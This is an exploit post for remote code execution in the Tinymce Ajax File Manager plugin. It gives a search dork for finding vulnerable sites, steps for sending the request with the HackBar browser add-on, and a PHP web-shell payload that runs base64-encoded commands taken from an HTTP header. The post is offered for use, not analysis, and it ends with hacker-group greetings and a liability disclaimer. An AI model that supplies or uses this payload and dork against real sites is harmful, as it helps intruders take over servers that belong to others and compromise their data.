____ ____ ____ _______/ |________ ____ ____
/ _ \ / \_/ __ \ / ___/\ __\_ __ \_/ __ \_/ __ \
( <_> ) | \ ___/ \___ \ | | | | \/\ ___/\ ___/
\____/|___| /\___ >____ > |_ | |__| \___ >\___ >
\/ \/ \/ \/ \/
# Exploit Title : timynce Ajax File Manager Remote Code
# Author : By onestree
# Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# tested : windows 7
# Dork : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/"
*************************************************************
how to run the exploit use firefox web browser
and download firefox add ons HackBar
exploit :
foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
====================================================================
tutorial video
https://www.youtube.com/watch?v=ahli-dehYWY
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny ( Fheby Yahya) :* muaaah
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information